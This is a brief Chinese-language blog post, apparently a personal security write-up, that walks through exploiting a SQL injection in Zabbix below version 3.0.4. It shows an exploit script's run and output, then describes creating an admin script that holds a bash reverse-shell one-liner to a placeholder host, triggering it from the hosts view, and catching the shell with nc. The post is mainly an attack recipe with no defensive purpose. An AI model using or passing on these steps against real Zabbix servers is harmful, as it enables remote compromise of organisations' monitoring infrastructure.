Zabbix sql注入漏洞脚本执行反弹shell

exp检测是否存在SQL注入漏洞
root@ubuntu:~# python zabbix.py http://ip:9090/
+------------------------------------------------------------+
Python Zabbix<3.0.4 SQL注入 Exploit
success
+------------------------------------------------------------+
Zabbix 存在SQL注入漏洞!

管理员 用户名密码:None

管理员 Session_id:None
然后进行登录:管理——脚本——创建脚本写入反弹shell、
bash -i >& /dev/tcp/xxx/1234 0>&1

 

 

监测——触发器——主机

执行我们编写的反弹shell脚本:

Nc监听端口

 

posted @ 2018-05-18 19:22  _H0f  阅读(1011)  评论(0编辑  收藏  举报